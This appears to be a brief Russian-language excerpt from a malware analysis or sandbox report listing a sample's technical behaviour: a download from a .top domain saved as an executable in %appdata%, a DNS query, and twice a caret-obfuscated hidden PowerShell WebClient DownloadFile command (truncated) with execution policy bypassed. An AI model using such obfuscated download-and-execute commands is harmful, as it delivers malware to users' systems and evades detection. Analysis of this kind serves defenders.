Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowErshe^lL.^EXe^ -EX^ECu^tI^o^nPOL^ICy bypAsS^ -NoprOFi^l^E^ -^W^INdoW^S^TY^L^e Hi^d^dEn (N^Ew-o^BjeC^t s^Y^s^TeM^.NE^t^.we^B^ClI^E^N^t)^.doWnLo^AD^FIL^e('http://roggistazl...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "PowErshe^lL.^EXe^ -EX^ECu^tI^o^nPOL^ICy bypAsS^ -NoprOFi^l^E^ -^W^INdoW^S^TY^L^e Hi^d^dEn (N^Ew-o^BjeC^t s^Y^s^TeM^.NE^t^.we^B^ClI^E^N^t)^.doWnLo^AD^FIL^e('http://roggistazl...' (со скрытым окном)